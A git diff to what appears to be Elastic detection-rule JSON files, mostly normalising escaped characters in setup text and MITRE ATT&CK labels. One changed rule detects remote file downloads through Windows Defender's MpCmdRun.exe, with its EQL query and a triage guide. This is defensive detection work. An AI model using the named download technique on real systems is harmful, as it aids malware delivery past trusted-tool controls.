"tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_106.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_106.json index 09db7b40d03..e4146a1f439 100644 --- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_106.json @@ -74,7 +74,7 @@ ], "risk_score": 73, "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_107.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_107.json index d5efc084e83..7c472e79d09 100644 --- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_107.json @@ -73,7 +73,7 @@ ], "risk_score": 73, "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_103.json b/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_103.json index 35b52dcf021..149f1a698bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_104.json b/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_104.json index 5a0d47985d4..ca6bbcca1ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c58c3081-2e1d-4497-8491-e73a45d1a6d6_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_103.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_103.json index 3beab5b3bd0..d6d3f2cf9cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_103.json @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_104.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_104.json index d445d4d89a8..bc3d89f5a0c 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_104.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_105.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_105.json index c45b8651f98..63fd56756ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_105.json @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_106.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_106.json index 88e8bd1eca9..301939f6265 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_106.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_103.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_103.json index be1ecd49c50..da8f3a27762 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_104.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_104.json index 9624e5eb307..273f0d3e20a 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_105.json b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_105.json index 76b9f8a4e42..8f89487bf08 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c5ce48a6-7f57-4ee8-9313-3d0024caee10_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_104.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_104.json index a7dc98ffc18..fdbf6b10595 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_104.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_105.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_105.json index 20c35ae6dcb..ef7d6f69e2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_105.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_106.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_106.json index 5260477a845..8a819445a63 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_106.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_107.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_107.json index 807459c6611..acaa8664c70 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_107.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_108.json b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_108.json index 0af0dfdb5fe..b1669bfeb40 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_108.json +++ b/packages/security_detection_engine/kibana/security_rule/c5dc3223-13a2-44a2-946c-e9dc0aa0449c_108.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_101.json b/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_101.json index 7d3d40b2cf7..b304957cac2 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_102.json b/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_102.json index 229300fa40f..af699000767 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c5f81243-56e0-47f9-b5bb-55a5ed89ba57_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_104.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_104.json index 9d62d3cc01b..7b1aa363bb7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", "references": [ "https://twitter.com/mohammadaskar2/status/1301263551638761477", @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_105.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_105.json index f495e19b3bc..2483b611143 100644 --- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- 